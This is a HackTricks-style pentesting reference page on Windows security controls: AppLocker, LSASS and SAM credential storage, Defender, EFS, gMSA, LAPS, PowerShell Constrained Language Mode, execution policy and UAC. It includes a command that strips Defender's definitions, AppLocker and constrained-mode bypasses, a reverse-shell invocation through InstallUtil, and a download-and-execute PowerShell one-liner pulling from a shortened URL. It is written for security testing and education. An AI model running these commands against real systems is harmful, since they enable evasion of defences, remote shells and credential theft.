authentication-credentials-uac-and-efs.md (17889B)
1 --- 2 title: "Windows Security Controls" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/authentication-credentials-uac-and-efs.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/authentication-credentials-uac-and-efs.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Windows Security Controls 14 15 ## AppLocker Policy 16 17 An application whitelist is a list of approved software applications or executables that are allowed to be present and run on a system. The goal is to protect the environment from harmful malware and unapproved software that does not align with the specific business needs of an organization. 18 19 [AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) is Microsoft's **application whitelisting solution** and gives system administrators control over **which applications and files users can run**. It provides **granular control** over executables, scripts, Windows installer files, DLLs, packaged apps, and packed app installers.\ 20 It is common for organizations to **block cmd.exe and PowerShell.exe** and write access to certain directories, **but this can all be bypassed**. 21 22 ### Check 23 24 Check which files/extensions are blacklisted/whitelisted: 25 26 ```bash 27 Get-ApplockerPolicy -Effective -xml 28 29 Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections 30 31 $a = Get-ApplockerPolicy -effective 32 $a.rulecollections 33 ``` 34 35 `Test-AppLockerPolicy` evaluates candidate files for a specific identity against an AppLocker policy. Test the account whose token will execute the payload because rules can target users or groups; `Get-AppLockerFileInformation` is also useful to inspect the path, hash, and publisher metadata on which rules may match.<sup>[[5]](#references)</sup> 36 37 ```powershell 38 $policy = Get-AppLockerPolicy -Effective 39 $user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name 40 Test-AppLockerPolicy -PolicyObject $policy -Path C:\Users\Public\payload.exe -User $user 41 Get-AppLockerFileInformation -Path C:\Users\Public\payload.exe | Format-List 42 ``` 43 44 This registry path contains the configurations and policies applied by AppLocker, providing a way to review the current set of rules enforced on the system: 45 46 - `HKLM\Software\Policies\Microsoft\Windows\SrpV2` 47 48 ### Bypass 49 50 - Useful **Writable folders** to bypass AppLocker Policy: If AppLocker is allowing to execute anything inside `C:\Windows\System32` or `C:\Windows` there are **writable folders** you can use to **bypass this**. 51 52 ```text 53 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys 54 C:\Windows\System32\spool\drivers\color 55 C:\Windows\Tasks 56 C:\windows\tracing 57 ``` 58 59 - Commonly **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker. 60 - **Poorly written rules could also be bypassed** 61 - For example, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, you can create a **folder called `allowed`** anywhere and it will be allowed. 62 - Organizations also often focus on **blocking the `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, but forget about the **other** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) such as `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` or `PowerShell_ISE.exe`. 63 - **DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using **DLLs as backdoors will help bypassing AppLocker**. 64 - You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).<sup>[[1]](#references)</sup> 65 66 ## Credentials Storage 67 68 ### Security Accounts Manager (SAM) 69 70 Local credentials are present in this file, the passwords are hashed. 71 72 ### Local Security Authority (LSA) - LSASS 73 74 The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\ 75 **LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\ 76 LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user. 77 78 The **credentials** are **saved** inside the **process LSASS**: Kerberos tickets, hashes NT and LM, easily decrypted passwords. 79 80 ### LSA secrets 81 82 LSA could save in disk some credentials: 83 84 - Password of the computer account of the Active Directory (unreachable domain controller). 85 - Passwords of the accounts of Windows services 86 - Passwords for scheduled tasks 87 - More (password of IIS applications...) 88 89 ### NTDS.dit 90 91 It is the database of the Active Directory. It is only present in Domain Controllers. 92 93 ## Defender 94 95 [**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) is an Antivirus that is available in Windows 10 and Windows 11, and in versions of Windows Server. It **blocks** common pentesting tools such as **`WinPEAS`**. However, there are ways to **bypass these protections**. 96 97 ### Check 98 99 To check the **status** of **Defender** you can execute the PS cmdlet **`Get-MpComputerStatus`** (check the value of **`RealTimeProtectionEnabled`** to know if it's active): 100 101 <pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus 102 103 [...] 104 AntispywareEnabled : True 105 AntispywareSignatureAge : 1 106 AntispywareSignatureLastUpdated : 12/6/2021 10:14:23 AM 107 AntispywareSignatureVersion : 1.323.392.0 108 AntivirusEnabled : True 109 [...] 110 NISEnabled : False 111 NISEngineVersion : 0.0.0.0 112 [...] 113 <strong>RealTimeProtectionEnabled : True 114 </strong>RealTimeScanDirection : 0 115 PSComputerName : 116 </code></pre> 117 118 To enumerate it you could also run: 119 120 ```bash 121 WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List 122 wmic /namespace:\\root\securitycenter2 path antivirusproduct 123 sc query windefend 124 125 #Delete all rules of Defender (useful for machines without internet access) 126 "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All 127 ``` 128 129 ## Encrypted File System (EFS) 130 131 EFS secures files through encryption, utilizing a **symmetric key** known as the **File Encryption Key (FEK)**. This key is encrypted with the user's **public key** and stored within the encrypted file's $EFS **alternative data stream**. When decryption is needed, the corresponding **private key** of the user's digital certificate is used to decrypt the FEK from the $EFS stream. More details can be found [here](https://en.wikipedia.org/wiki/Encrypting_File_System). 132 133 **Decryption scenarios without user initiation** include: 134 135 - When files or folders are moved to a non-EFS file system, like [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), they are automatically decrypted. 136 - Encrypted files sent over the network via SMB/CIFS protocol are decrypted prior to transmission. 137 138 This encryption method allows **transparent access** to encrypted files for the owner. However, simply changing the owner's password and logging in will not permit decryption. 139 140 **Key Takeaways**: 141 142 - EFS uses a symmetric FEK, encrypted with the user's public key. 143 - Decryption employs the user's private key to access the FEK. 144 - Automatic decryption occurs under specific conditions, like copying to FAT32 or network transmission. 145 - Encrypted files are accessible to the owner without additional steps. 146 147 ### Check EFS info 148 149 Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect` 150 151 Check **who** has **access** to the file using cipher /c \<file>\ 152 You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files 153 154 ### Decrypting EFS files 155 156 #### Being Authority System 157 158 This approach requires the **victim user** to be **running** a **process** on the host. If so, from a `meterpreter` session you can impersonate the user's process token (`impersonate_token` from `incognito`). Alternatively, you can `migrate` into the user's process. 159 160 #### Knowing the User's Password 161 162 Mimikatz can import the user's certificate and private key, then use them to decrypt EFS-protected files.<sup>[[2]](#references)</sup> 163 164 [Howto ~ Decrypt Efs Files](https%3A//github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files) 165 166 ## Group Managed Service Accounts (gMSA) 167 168 Microsoft developed **Group Managed Service Accounts (gMSA)** to simplify the management of service accounts in IT infrastructures. Unlike traditional service accounts that often have the "**Password never expire**" setting enabled, gMSAs offer a more secure and manageable solution: 169 170 - **Automatic Password Management**: gMSAs use a complex, 240-character password that automatically changes according to domain or computer policy. This process is handled by Microsoft's Key Distribution Service (KDC), eliminating the need for manual password updates. 171 - **Enhanced Security**: These accounts are immune to lockouts and cannot be used for interactive logins, enhancing their security. 172 - **Multiple Host Support**: gMSAs can be shared across multiple hosts, making them ideal for services running on multiple servers. 173 - **Scheduled Task Capability**: Unlike managed service accounts, gMSAs support running scheduled tasks. 174 - **Simplified SPN Management**: The system automatically updates the Service Principal Name (SPN) when there are changes to the computer's sAMaccount details or DNS name, simplifying SPN management. 175 176 The passwords for gMSAs are stored in the LDAP property _**msDS-ManagedPassword**_ and are automatically reset every 30 days by Domain Controllers (DCs). This password, an encrypted data blob known as [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), can only be retrieved by authorized administrators and the servers on which the gMSAs are installed, ensuring a secure environment. To access this information, a secured connection such as LDAPS is required, or the connection must be authenticated with 'Sealing & Secure'. 177 178 <sup>[[3]](#references)</sup> 179 180 You can read this password with [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:** 181 182 ```text 183 /GMSAPasswordReader --AccountName jkohler 184 ``` 185 186 [**Find more info in this post**](https://cube0x0.github.io/Relaying-for-gMSA/)<sup>[[3]](#references)</sup> 187 188 Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.<sup>[[3]](#references)</sup> 189 190 ## LAPS 191 192 Distinguish **legacy Microsoft LAPS** from the native **Windows LAPS** implementation during enumeration. Windows LAPS shipped in the April 11, 2023 Windows updates and can back up a managed local administrator password to **Windows Server Active Directory** or **Microsoft Entra ID**. In AD-backed deployments it can additionally encrypt passwords, retain encrypted password history, and manage a domain controller's DSRM password. The downloadable legacy MSI is deprecated on newer Windows versions, although Windows LAPS can operate in legacy-emulation mode.<sup>[[6]](#references)</sup> 193 194 Because legacy Microsoft LAPS and Windows LAPS are separate implementations, identify which one is deployed before applying attribute- or cmdlet-specific attacks. The linked page covers discovery, ACL enumeration, retrieval, expiration manipulation, and offline recovery without duplicating those procedures here.<sup>[[6]](#references)</sup> 195 196 [Laps](/hacktricks/windows-hardening/active-directory-methodology/laps) 197 198 ## PS Constrained Language Mode 199 200 PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **locks down many of the features** needed to use PowerShell effectively, such as blocking COM objects, only allowing approved .NET types, XAML-based workflows, PowerShell classes, and more. 201 202 ### **Check** 203 204 ```bash 205 $ExecutionContext.SessionState.LanguageMode 206 #Values could be: FullLanguage or ConstrainedLanguage 207 ``` 208 209 ### Bypass 210 211 ```bash 212 #Easy bypass 213 Powershell -version 2 214 ``` 215 216 In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\ 217 **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**. 218 219 #### Direct bypass: 220 221 ```bash 222 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe 223 ``` 224 225 #### Reverse shell: 226 227 ```bash 228 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe 229 ``` 230 231 You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).<sup>[[1]](#references)</sup> 232 233 ## PS Execution Policy 234 235 By default it is set to **restricted.** Main ways to bypass this policy:<sup>[[4]](#references)</sup> 236 237 ```bash 238 1º Just copy and paste inside the interactive PS console 239 2º Read en Exec 240 Get-Content .runme.ps1 | PowerShell.exe -noprofile - 241 3º Read and Exec 242 Get-Content .runme.ps1 | Invoke-Expression 243 4º Use other execution policy 244 PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1 245 5º Change users execution policy 246 Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted 247 6º Change execution policy for this session 248 Set-ExecutionPolicy Bypass -Scope Process 249 7º Download and execute: 250 powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')" 251 8º Use command switch 252 Powershell -command "Write-Host 'My voice is my passport, verify me.'" 253 9º Use EncodeCommand 254 $command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand 255 ``` 256 257 More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)<sup>[[4]](#references)</sup> 258 259 ## Security Support Provider Interface (SSPI) 260 261 Is the API that can be use to authenticate users. 262 263 The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate. 264 265 ### Main SSPs 266 267 - **Kerberos**: The preferred one 268 - %windir%\Windows\System32\kerberos.dll 269 - **NTLMv1** and **NTLMv2**: Compatibility reasons 270 - %windir%\Windows\System32\msv1_0.dll 271 - **Digest**: Web servers and LDAP, password in form of a MD5 hash 272 - %windir%\Windows\System32\Wdigest.dll 273 - **Schannel**: SSL and TLS 274 - %windir%\Windows\System32\Schannel.dll 275 - **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one) 276 - %windir%\Windows\System32\lsasrv.dll 277 278 #### The negotiation could offer several methods or only one. 279 280 ## UAC - User Account Control 281 282 [User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. 283 284 [Uac User Account Control](/hacktricks/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control) 285 286 287 ## References 288 289 - [1] [Bypassing AppLocker and PowerShell constrained language mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode) 290 - [2] [howto ~ decrypt EFS files](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files) 291 - [3] [Relaying for gMSA](https://cube0x0.github.io/Relaying-for-gMSA/) 292 - [4] [15 Ways to Bypass the PowerShell Execution Policy](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) 293 - [5] [Use the AppLocker Windows PowerShell cmdlets](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/applocker/use-the-applocker-windows-powershell-cmdlets) 294 - [6] [Windows LAPS overview](https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-overview)